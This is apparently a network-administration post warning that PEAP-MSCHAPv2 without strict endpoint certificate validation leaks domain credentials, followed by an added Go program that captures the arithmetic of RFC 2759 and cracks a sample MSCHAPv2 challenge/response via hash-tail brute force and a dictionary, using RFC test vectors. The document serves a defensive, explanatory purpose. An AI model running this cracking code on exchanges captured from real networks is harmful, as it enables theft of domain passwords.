First, be sure you don't use wildcard certificates (*.domain.com). Some operating systems, like Windows, don't accept wildcard RADIUS certificates.
Second, when you use PEAP-MSCHAPv2, the client has to trust the RADIUS server certificate the very first time, because the client doesn't ask for it the way a web interface does with an HTTP request for a domain name. The client doesn't expect the server certificate. Yes, it is valid by the external CA, but the client doesn't trust it on the first connection because it didn't ask for it.
Third, PEAP-MSCHAPv2 is insecure when you don't strictly manage the endpoints. If a client can accept an unknown server certificate, the inner MSCHAPv2 hash can be drained into a hacker's hands. MSCHAPv2 can be easily decoded by a hacker to get your domain credentials.
So please use EAP-TLS if at all possible, or strictly manage your endpoints with a GPO policy or MDM.
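To show what the post means by the inner MSCHAPv2 exchange being "easily decoded", here is an added Go example; it is not code from the original post or from any product mentioned in it. It reproduces the RFC 2759 arithmetic: the NT hash (MD4 over the UTF-16LE password), the 8-byte challenge hash, and the 24-byte NT-Response made of three DES encryptions of that challenge under keys cut from the hash. Because the third DES key contains only two unknown hash bytes, a 2^16 search recovers them from any captured challenge/response pair, and an offline dictionary attack on the password follows. Go is used because its standard library has DES; MD4 is implemented inline since the standard library lacks it. The sample exchange is the RFC 2759 section 9.2 test vector (username User, password clientPass) rather than a real capture, and the three-word wordlist is constructed for the demo. In the scenario the post describes, a rogue access point presenting its own certificate collects exactly these values from a client that clicks through the certificate warning.

```go
// Added example, not code from the original post: why a captured PEAP-MSCHAPv2
// inner exchange hands an attacker the domain password (RFC 2759 arithmetic).
package main

import (
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// md4 implements RFC 1320 inline (Go's standard library has no MD4); the NT hash
// that MS-CHAPv2 is built on is MD4 over the UTF-16LE password.
func md4(data []byte) [16]byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	msg := append(append([]byte{}, data...), 0x80) // pad: 0x80, zeros to 56 mod 64, LE bit length
	msg = append(msg, make([]byte, (120-len(msg)%64)%64+8)...)
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	rotl := func(v uint32, s uint) uint32 { return v<<s | v>>(32-s) }
	sh := [3][4]uint{{3, 7, 11, 19}, {3, 5, 9, 13}, {3, 9, 11, 15}}
	x3 := [16]int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x {
			x[i] = binary.LittleEndian.Uint32(msg[off+4*i:])
		}
		aa, bb, cc, dd := a, b, c, d
		for r := 0; r < 48; r++ { // rounds 1-3 of RFC 1320 section 3.4, 16 steps each
			i, f, k, xi := r%16, uint32(0), uint32(0), r%16
			switch r / 16 {
			case 0:
				f = (b & c) | (^b & d)
			case 1:
				f, k, xi = (b&c)|(b&d)|(c&d), 0x5a827999, i%4*4+i/4
			default:
				f, k, xi = b^c^d, 0x6ed9eba1, x3[i]
			}
			a = rotl(a+f+x[xi]+k, sh[r/16][i%4])
			a, b, c, d = d, a, b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range []uint32{a, b, c, d} {
		binary.LittleEndian.PutUint32(out[4*i:], v)
	}
	return out
}

// ntHash is the NT password hash: MD4 of the password encoded as UTF-16LE.
func ntHash(password string) [16]byte {
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	return md4(buf)
}

// challengeHash is RFC 2759 ChallengeHash(): SHA1(peer || authenticator || user)[0:8].
func challengeHash(peer, auth []byte, user string) []byte {
	s := sha1.Sum(append(append(append([]byte{}, peer...), auth...), user...))
	return s[:8]
}

// desEncrypt spreads a 7-byte key over DES's 8 parity-padded key bytes and encrypts one block.
func desEncrypt(k7, block []byte) []byte {
	var v uint64
	for _, b := range k7 {
		v = v<<8 | uint64(b)
	}
	key, out := make([]byte, 8), make([]byte, 8)
	for i := range key {
		key[i] = byte(v>>(49-7*uint(i))&0x7f) << 1 // 7 key bits, parity bit in the LSB
	}
	c, _ := des.NewCipher(key) // key is always 8 bytes, so NewCipher cannot fail
	c.Encrypt(out, block)
	return out
}

// ntResponse is RFC 2759 ChallengeResponse(): NT hash + 5 zero bytes = three 7-byte DES keys,
// each encrypting the same challenge. The third key therefore has only two unknown bytes.
func ntResponse(hash [16]byte, ch []byte) []byte {
	padded := append(hash[:], 0, 0, 0, 0, 0)
	var resp []byte
	for i := 0; i < 3; i++ {
		resp = append(resp, desEncrypt(padded[7*i:7*i+7], ch)...)
	}
	return resp
}

// recoverHashTail brute-forces the third DES key: at most 2^16 trials reveal hash[14:16]
// from a captured challenge/response pair, with no password guessing at all.
func recoverHashTail(ch, resp []byte) ([]byte, bool) {
	k := make([]byte, 7)
	for i := 0; i < 1<<16; i++ {
		k[0], k[1] = byte(i>>8), byte(i)
		if string(desEncrypt(k, ch)) == string(resp[16:]) {
			return k[:2], true
		}
	}
	return nil, false
}

// crackPassword is the offline dictionary attack run on the capture; the recovered
// hash tail discards most candidates before any full response computation.
func crackPassword(ch, resp []byte, wordlist []string) (string, bool) {
	tail, _ := recoverHashTail(ch, resp)
	for _, w := range wordlist {
		if h := ntHash(w); string(h[14:]) == string(tail) && string(ntResponse(h, ch)) == string(resp) {
			return w, true
		}
	}
	return "", false
}

func main() {
	// Sample exchange: the RFC 2759 section 9.2 test vectors (user "User", password
	// "clientPass"); a rogue AP captures the same values. The wordlist is constructed.
	auth, _ := hex.DecodeString("5B5D7C7D7B3F2F3E3C2C602132262628")
	peer, _ := hex.DecodeString("21402324255E262A28295F2B3A337C7E")
	ch := challengeHash(peer, auth, "User")
	resp := ntResponse(ntHash("clientPass"), ch)
	pw, ok := crackPassword(ch, resp, []string{"Welcome1", "password", "clientPass"})
	fmt.Printf("challenge %X\nresponse  %X\ncracked   %q %v\n", ch, resp, pw, ok)
}
```

Running it prints the challenge, the 24-byte response and the cracked password. In practice the captured username, challenge and response are fed to asleap or hashcat instead; the 2^16 tail recovery shown here is also why a password that is in no wordlist still falls, since the remaining 14 hash bytes are two DES keys that encrypt the same challenge and can be tested together in a single 2^56 search. None of this is possible when the client validates the RADIUS server certificate and name before sending the inner MSCHAPv2 exchange, which is what the GPO or MDM profile enforces.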